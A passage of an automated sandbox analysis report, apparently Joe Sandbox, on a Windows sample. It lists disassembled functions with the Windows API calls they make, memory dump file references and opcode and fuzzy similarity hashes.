                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: E%A
                                                                                                                                                                                  • API String ID: 0-2968342411
                                                                                                                                                                                  • Opcode ID: 7ca7371e040589999eb6c7150dc93f563d3fada959be2a58b7ed5566c88e72e7
                                                                                                                                                                                  • Instruction ID: 68baaf478b5ba489b7f4f6dc58ab6133a53f49c903438c2939d3c74e9c7d72bf
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ca7371e040589999eb6c7150dc93f563d3fada959be2a58b7ed5566c88e72e7
                                                                                                                                                                                  • Instruction Fuzzy Hash: C572D07BFB6E25072B5CC8BA9CA32BA94C357D871471EE17E595AE7345DCBC8C020284
                                                                                                                                                                                  Function 000D30D0 Relevance: 2.3, APIs: 1, Instructions: 794COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 000D30F0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1473215900.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.1473194832.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473343043.0000000000125000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473402929.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473418386.0000000000133000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473433407.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473484039.000000000013A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_50000_PqSIlYOaIF.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___std_exception_destroy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4194217158-0
                                                                                                                                                                                  • Opcode ID: 43e3f151957678556ff660db23461082904f5b00af759e61b0eb31770f27d722
                                                                                                                                                                                  • Instruction ID: 76af525521910b8ed98e6fb2b911fe1d6bc073a090210eb30d4506e03de1a6a1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 43e3f151957678556ff660db23461082904f5b00af759e61b0eb31770f27d722
                                                                                                                                                                                  • Instruction Fuzzy Hash: F422137BFB2921076B0CC47A9CA32EA56C357D872471EE13E485AE7395DCBD8C0602C5
                                                                                                                                                                                  Function 0011C148 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00118244: HeapAlloc.KERNEL32(00000008,00000000,00000000,?,001173DF,00000001,00000364,00000005,000000FF,DEFE43E6,00000000,?,0010F8D5,00000000,?), ref: 00118285
                                                                                                                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0011C2E9
                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0011C3DD
                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0011C41C
                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0011C44F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1473215900.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.1473194832.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473343043.0000000000125000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473402929.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473418386.0000000000133000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473433407.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473484039.000000000013A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_50000_PqSIlYOaIF.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2701053895-0
                                                                                                                                                                                  • Opcode ID: bd52e1ab3d545e02a55ed74cfc0d35da0019344a2cff02c1fefee73579a5bf0c
                                                                                                                                                                                  • Instruction ID: b53e11ef9e6074881e4a46440332358dc8937993c40cce59ab6bb6c60abed3b6
                                                                                                                                                                                  • Opcode Fuzzy Hash: bd52e1ab3d545e02a55ed74cfc0d35da0019344a2cff02c1fefee73579a5bf0c
                                                                                                                                                                                  • Instruction Fuzzy Hash: A4512675980218AFDF18AF7C9C959FEB7B9DB56304F1441B9F80997202EB308DC19BA0
                                                                                                                                                                                  Function 000B4967 Relevance: 1.7, Strings: 1, Instructions: 416COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1473215900.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.1473194832.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473343043.0000000000125000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473402929.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473418386.0000000000133000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473433407.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473484039.000000000013A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_50000_PqSIlYOaIF.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: T^/
                                                                                                                                                                                  • API String ID: 0-765251419
                                                                                                                                                                                  • Opcode ID: 8f5bfd8ab5ae663c88253b58555e389ce6831141e4d7970ebc024e727457ad72
                                                                                                                                                                                  • Instruction ID: a29a5aba51755be47fb796b5a485f6589ba4d67a03da1efffa0ffb4d8ef3576f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f5bfd8ab5ae663c88253b58555e389ce6831141e4d7970ebc024e727457ad72
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5DC1397BFB14204BEF188579D8A63EB57D647A5310F1FA47B8846D7382DCAE8C494B80
                                                                                                                                                                                  Function 0011814D Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00112551: EnterCriticalSection.KERNEL32(?,?,00117628,?,00131598,00000008,0011751A,00000000,00000000,?), ref: 00112560
                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00118140,00000001,00131618,0000000C,00117B41,-00000050), ref: 00118185
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1473215900.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.1473194832.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473343043.0000000000125000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473402929.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473418386.0000000000133000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473433407.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473484039.000000000013A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_50000_PqSIlYOaIF.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1272433827-0
                                                                                                                                                                                  • Opcode ID: ff3740164b2dbb656f2ea71d0491f6a4de2beb7da90881efc3fd81c902740dc9
                                                                                                                                                                                  • Instruction ID: 75ee9561b2530399a329dd9a53f80ffbe80baa3495d04b755cd5cfe9ae6fd204
                                                                                                                                                                                  • Opcode Fuzzy Hash: ff3740164b2dbb656f2ea71d0491f6a4de2beb7da90881efc3fd81c902740dc9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 97F01D72A00204EFDB04EF98E852B9D77F0EB59725F10812AF510DB6E1CBB55981CF81
                                                                                                                                                                                  Function 00118870 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1473215900.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.1473194832.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473343043.0000000000125000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473402929.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473418386.0000000000133000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473433407.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473484039.000000000013A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_50000_PqSIlYOaIF.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                                  • Opcode ID: df93450f078ea3e9584b11c2c7b84eef3e35bc774edb592eeb4c6ec027982986
                                                                                                                                                                                  • Instruction ID: 8cbac333d5672fbd929de3282a3fca9c634614016a587ab2cffb3f56aba47c18
                                                                                                                                                                                  • Opcode Fuzzy Hash: df93450f078ea3e9584b11c2c7b84eef3e35bc774edb592eeb4c6ec027982986
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7CA001B06022018FE7518F75AB1A20A3AEAAB9A69170A4069A409D9A64EB3594A09A01
                                                                                                                                                                                  Function 000C30F0 Relevance: .8, Instructions: 825COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1473215900.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.1473194832.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473343043.0000000000125000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473402929.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473418386.0000000000133000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473433407.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473484039.000000000013A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_50000_PqSIlYOaIF.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9486d0e7b9b50c343cefd29ae89ab0a6e66850f87713a9b76bd847cb77754717
                                                                                                                                                                                  • Instruction ID: 017f0b8dcd57869915bb7ff4106463de5308a38e992cac3911051155ec591bf7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9486d0e7b9b50c343cefd29ae89ab0a6e66850f87713a9b76bd847cb77754717
                                                                                                                                                                                  • Instruction Fuzzy Hash: DC221D7BBA16100FEB4888B988EA3E727C247E5315F1FB43E4949D7252DC9F484E5A80
                                                                                                                                                                                  Function 000C2920 Relevance: .7, Instructions: 670COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1473215900.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.1473194832.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473343043.0000000000125000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473402929.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473418386.0000000000133000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473433407.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473484039.000000000013A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_50000_PqSIlYOaIF.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4c72a76f373dbcbc939698a02640b16751094c75e0340844de5c34ee29774bc6
                                                                                                                                                                                  • Instruction ID: ebde69b4bebbc4d902dce52fb83b6f6db0d05da9a0924c06ade2a5ad9cd5cffe
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c72a76f373dbcbc939698a02640b16751094c75e0340844de5c34ee29774bc6
                                                                                                                                                                                  • Instruction Fuzzy Hash: AA02397BFA55204FEB48847A88A93E75BC307E9724F1FE43D4999D7241DCAF484A4B80
                                                                                                                                                                                  Function 00104832 Relevance: .3, Instructions: 338COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1473215900.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.1473194832.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473343043.0000000000125000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473402929.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473418386.0000000000133000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473433407.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473484039.000000000013A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_50000_PqSIlYOaIF.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 95d1376aea043c5574f8549134067256945106fe1d969a558080632b1190a5ef
                                                                                                                                                                                  • Instruction ID: 09e134c195c55bfc9114ebbfec873b7e6680e82d2963438ba77dd9caa45f55c5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 95d1376aea043c5574f8549134067256945106fe1d969a558080632b1190a5ef
                                                                                                                                                                                  • Instruction Fuzzy Hash: 57914C7BF609200BEB48C4398CAA3E757C747D4764F1EA43A8998D7242ED9FCC4656C0
                                                                                                                                                                                  Function 0011509C Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1473215900.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.1473194832.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473343043.0000000000125000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473402929.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473418386.0000000000133000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473433407.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.1473484039.000000000013A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_50000_PqSIlYOaIF.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AdjustPointer
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1740715915-0
                                                                                                                                                                                  • Opcode ID: a8b8c7436ec15eea1eb53a52cf9f8c56454740bd07587a0a9e95820ced80037f
                                                                                                                                                                                  • Instruction ID: 70a65189b2d4b5f9ef63fba0b880d3cb2e4313a31c4e7a74d6b017813edc5e61
                                                                                                                                                                                  • Opcode Fuzzy Hash: a8b8c7436ec15eea1eb53a52cf9f8c56454740bd07587a0a9e95820ced80037f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5751BE72605A06EFDB2E9F14D841BEA77A6FF94710F244539EC464B291E7B1ACC0CB90